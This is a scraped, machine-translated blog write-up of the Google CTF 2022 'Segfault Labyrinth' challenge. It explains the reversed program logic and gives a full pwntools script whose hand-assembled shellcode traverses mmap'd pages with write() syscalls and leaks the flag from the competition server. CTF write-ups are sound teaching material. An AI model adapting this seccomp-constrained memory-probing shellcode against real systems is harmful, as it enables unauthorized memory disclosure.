当前位置:网站首页>2022 Google CTF SEGFAULT LABYRINTH wp
2022 Google CTF SEGFAULT LABYRINTH wp
2022-07-07 01:16:00 【xyzmpv】
Don't ask me why I came to play on weekends CTF Ask is deserved :)
Google CTF 2022 SEGFAULT LABYRINTH wp
The famous Google CTF. Last year, I saw a master draw a whole paper flow chart and make a reverse , Try it yourself this year ( since ) try ( abuse ) once .
Of course pwn It's impossible. pwn Of , Can only do Tao misc Maintain life like this . Fortunately, it was made on the first day SEGFAULT LABYRINTH This way Misc, The ranking of the questions handed in is also quite good ( Of course, I touched it the next day ). Here to share my wp.
logic analysis
First of all, there is basically only one main body of the whole program main function , It's not hard to reverse .
Apply for one at the beginning mmap The block is used to put the pointer , Fixed address ( This address will finally be given to you ). Then enter while loop .
The main logic of the program is here while(1) In the cycle of . First read a random number , Then take the low of the first byte of this random number 4 Position and hold high 4 A reset ( In fact, this random number is really used only this low 4 position ).
Every cycle will reapply 16 individual mmap Block and write its address in order v5 Point to space . In this process, random numbers will be used in 0-16 Middle draw , Only the one who wins has permission ( Of course, you may also have a dark face , Draw to 1 perhaps 2 The only authority is 3 or 6).
For the first time v5
It's the one who applied at the beginning mmap The address of the block , Each cycle will v5
Assign the value to the address of the authorized block in this cycle ( Otherwise, I can't continue to write the address next )
in other words , The whole process is equivalent to the growth process of a forked tree , Pick one random node at a time , Grow on this node 16 Child node , And so on
Take a closer look and you can see , involve flag
Part of if(!--v4)
In this judgment , because v4 Initially 10, So in fact, I have to run to No 10 The second cycle will enter the logic , At this time, it has been initialized 16^10 Nodes ( Address ). In this branch , Will flag Read to the last node with permission .
The schematic diagram is shown below :
then , Allocate a piece with RWX Section of permission ( And put customized shellcode), Output Welcome to the Segfault Labyrinth
, Set protection
Let you cover ptr[0]
And read in a length of ptr[0] % (4096 - v16)
Bytes of shellcode And implement
Pay attention to two points :
- As mentioned earlier ,shellcode The beginning of has been given , And the total length shall not exceed 4096
- perform shellcode The parameter is
mmap_addr_1
, That is to say Fork tree head node address
It's dead shellcode Opening paragraph ( Deliberately left rdi)
Sandbox protection
Their thinking
In essence, the requirement of the topic is to traverse the bifurcation tree and find the last node , And print it out .
Looking at the protection, we can find that there are only a few system calls that can be used . The first reaction is directly used shellcraft Generate shellcode Or write C To compile , Pull it down PIC.
But the actual debugging also found , You can't use the stack, otherwise it will directly SEGFAULT
( This should also be the source of the title ). under these circumstances , It is almost impossible to achieve it in the above two ways , So I can only rub my hands shellcode 了
At first, the idea was to take the value of the empty node directly, and then cmp 0
, But the permissions of empty nodes found in debugging are 0, Direct value will collapse . There is a master to put it forward for use mmap To test node permissions , The result will also collapse .
The final solution is very simple and crude —— Directly through write Traverse and print each node . For non empty nodes , Return value rax It's length. , The return value of an empty node is negative . adopt control write length +cmp rax, length + Conditions jump
Methods , You can traverse this fork tree .
Finally rubbed out exp as follows :
# -*- coding:utf-8 -*-
from pwn import *
#from LibcSearcher import *
context(os='linux', arch='amd64', log_level='debug')
#p = process('./challenge')
p = remote('segfault-labyrinth.2022.ctfcompetition.com', 1337)
#p = ssh(host='pwnable.kr',user='fd',password='guest',port=2222)
#e = ELF()
#gdb.attach(p,'''
#b* $rebase(0x14E8)
#c
#si 16
#si 5
#''')
#local_file =
#libc =
#elf = ELF(local_file)
se = lambda data :p.send(data)
sa = lambda delim,data :p.sendafter(delim, data)
sl = lambda data :p.sendline(data)
sla = lambda delim,data :p.sendlineafter(delim, data)
sea = lambda delim,data :p.sendafter(delim, data)
rc = lambda numb=4096 :p.recv(numb)
rl = lambda :p.recvline()
ru = lambda delims :p.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info = lambda tag, addr :p.info(tag + ': {:#x}'.format(addr))
payload=asm('mov r15,rdi') # Save the header node address
payload+=asm('mov rsi,[rdi]') # Take the first address pointed to by the header node
payload+=asm('mov rdi,1')
payload+=asm('mov rdx,0x40')
payload+=asm('mov rax,1')
payload+=asm('syscall') # structure write
payload+=asm('add r15,8') # By default, it does not pass the verification , The head node pointer moves forward
payload+=asm('mov rdi,r15')
payload+=asm('cmp rax,0x40')
payload+=asm('jnz $-37') # If it doesn't pass , Then the preliminary preparation is completed , Directly jump back to the second compilation
payload+=asm('sub r15,8') # adopt , First reset the head node pointer , Iterate over the pointer
payload+=asm('mov r15,[r15]')
payload+=asm('mov rdi,r15')
payload+=asm('jmp $-49')# Return to the second compilation , Continue to cycle
sa('Welcome to the Segfault Labyrinth',p64(len(payload)))
se(payload)
p.interactive()
Summary
- I feel good about this method , adopt write The error and return value of are used for traversal judgment , At the same time, it can also be printed directly flag, And the length is only 14 A collection of articles
- pwntools The upward jump of assembly is the same as that of a normal assembler , You need to calculate the length of the previous instruction before writing
- At first, I was wrong , think
v5
Always the one given at the beginning mmap Address , After debugging, I found that I couldn't find it directly flag, And there is a pile of memory mmap block , That's how it came about - Thanks to the two masters who participated in the brainstorming process , Provided many valuable suggestions . For the first time in this level of competition, the sequence of questions is relatively good , Still very happy .
pwn It's impossible. pwn Of , I can only do something misc Maintain life like this
边栏推荐
- 身体质量指数程序,入门写死的小程序项目
- 微信公众号发送模板消息
- Boot - Prometheus push gateway use
- Pytorch中torch和torchvision的安装
- The printf function is realized through the serial port, and the serial port data reception is realized by interrupt
- Force buckle 1037 Effective boomerang
- Atomic in golang, and cas Operations
- 树莓派/arm设备上安装火狐Firefox浏览器
- Transformation transformation operator
- Implementation principle of waitgroup in golang
猜你喜欢
Do you understand this patch of the interface control devaxpress WinForms skin editor?
UI control telerik UI for WinForms new theme - vs2022 heuristic theme
Force buckle 1037 Effective boomerang
迈动互联中标北京人寿保险,助推客户提升品牌价值
城联优品入股浩柏国际进军国际资本市场,已完成第一步
ESP Arduino (IV) PWM waveform control output
[100 cases of JVM tuning practice] 05 - Method area tuning practice (Part 2)
【JVM调优实战100例】05——方法区调优实战(下)
Build your own website (17)
资产安全问题或制约加密行业发展 风控+合规成为平台破局关键
随机推荐
UI控件Telerik UI for WinForms新主题——VS2022启发式主题
taro3.*中使用 dva 入门级别的哦
Gazebo的安装&与ROS的连接
ZABBIX 5.0: automatically monitor Alibaba cloud RDS through LLD
微信公众号发送模板消息
Anfulai embedded weekly report no. 272: 2022.06.27--2022.07.03
力扣1037. 有效的回旋镖
[Niuke] b-complete square
[牛客] [NOIP2015]跳石头
[batch dos-cmd command - summary and summary] - string search, search, and filter commands (find, findstr), and the difference and discrimination between find and findstr
Address information parsing in one line of code
Openjudge noi 1.7 10: simple password
Case development of landlord fighting game
Build your own website (17)
「精致店主理人」青年创业孵化营·首期顺德场圆满结束!
THREE.AxesHelper is not a constructor
from . cv2 import * ImportError: libGL. so. 1: cannot open shared object file: No such file or direc
界面控件DevExpress WinForms皮肤编辑器的这个补丁,你了解了吗?
In rails, when the resource creation operation fails and render: new is called, why must the URL be changed to the index URL of the resource?
Oracle:CDB限制PDB资源实战